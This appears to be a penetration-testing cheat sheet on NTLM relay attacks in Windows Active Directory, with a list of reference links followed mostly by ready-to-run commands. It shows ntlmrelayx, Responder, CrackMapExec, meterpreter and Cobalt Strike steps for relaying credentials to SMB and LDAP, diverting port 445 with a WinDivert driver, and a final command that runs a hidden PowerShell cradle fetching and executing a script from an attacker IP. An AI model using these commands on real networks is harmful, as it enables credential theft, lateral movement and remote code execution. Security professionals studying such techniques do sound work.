- https://en.hackndo.com/ntlm-relay/
- https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/
- https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
- https://www.secureauth.com/blog/playing-with-relayed-credentials/
- https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire
- https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/
- https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/
- https://luemmelsec.github.io/Relaying-101/
- https://www.thehacker.recipes/active-directory-domain-services/movement/lm-and-ntlm/relay
- https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
- https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay
- https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html
- https://labs.nettitude.com/blog/network-relaying-abuse-windows-domain/
- https://xakep.ru/2023/04/07/ntlm-relay-guide/
- https://xakep.ru/2023/04/11/ntlm-relay-guide-2/
- [PDF] Coercions and Relays – The First Cred is the Deepest (Gabriel Prudhomme)
{% embed url="https://youtu.be/b0lLxLJKaRs" %}
{% file src="/.gitbook/assets/Lateral Movement using Credentials Relaying (taso_x).pdf" %}
Generate relay list with CME and enumerate local admins when relaying:
$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
Relay & catch hashes (via multi-relay):
$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445
{% hint style="info" %}
The easier way though is to use the combination of -of/--output-file hashes.txt -ntlmchallenge 1122334455667788 options to save the hash with a predefined challenge to a file while relaying.
{% endhint %}
Relay NTLM2 responses obtained from Responder's proxy authentication to LDAP(S) (Responder's HTTP must be Off):
{% embed url="https://twitter.com/theluemmel/status/1455099572305416197" %}
$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v
$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz
- https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/
- https://github.com/pkb1s/SharpRelay
Divert incoming SMB traffic from Victim to Attacker's local 445 port through an elevated meterpreter session and relay it to Target via MSF SOCKS server.
1. Add a static route to the Target through the 1st meterpreter session:
meterpreter > route add 192.168.1.11/32 1
2. Start MSF SOCKS server:
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j
3. Forward a reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local 8445 port:
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run
4. Relay the diverted traffic to Target through SOCKS:
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support
{% hint style="warning" %} When ran once, the driver must be unloaded or the host rebooted before trying again. The fake service can be deleted with a PowerShell command:
PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)
{% endhint %}
Set SOCKS server & port forwarding, upload WinDivert driver and configure redirection with PortBender:
beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445
Relay the planet:
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'
Stop PortBender:
beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>